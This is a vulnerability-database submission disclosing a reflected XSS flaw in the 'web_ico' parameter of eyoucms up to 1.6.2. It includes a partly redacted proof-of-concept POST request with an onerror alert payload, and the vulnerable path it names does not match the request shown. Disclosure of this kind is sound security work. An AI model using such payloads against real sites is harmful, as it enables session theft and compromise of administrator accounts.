Submit #111320: eyoucms up to 1.6.2 'web_ico' reflected xss vulnerability info

Title: eyoucms up to 1.6.2 'web_ico' reflected xss vulnerability
Description: eyoucms up to 1.6.2 has an XSS vulnerability. The vulnerable URI is /yxcms/index.php?r=admin/extendfield/mesedit&tabid=12&id=4 and the vulnerable multipart parameter is name="web_ico". POC below:

POST /eyoucms/login.php?m=admin&c=System&a=web&lang=cn HTTP/1.1
*****************************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
Content-Disposition: form-data; name="web_ico"

<img src=1 onerror=alert(8)>
------WebKitFormBoundaryq3khRwDr0dBifJAy
**********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy--

See details at https://github.com/sleepyvv/vul_report/blob/main/EYOUCMS/XSS2.md
Source: https://www.eyoucms.com/
User: WWesleywww (UID 43117)
Submission: 07.04.2023 15:36 (3 years ago)
Moderation: 14.04.2023 10:36 (7 days later)
Status: Accepted
VulDB entry: 225943 [EyouCms up to 1.6.2 HTTP POST Request mesedit&tabid=12&id=4 web_ico Cross Site Scripting]
Points: 17
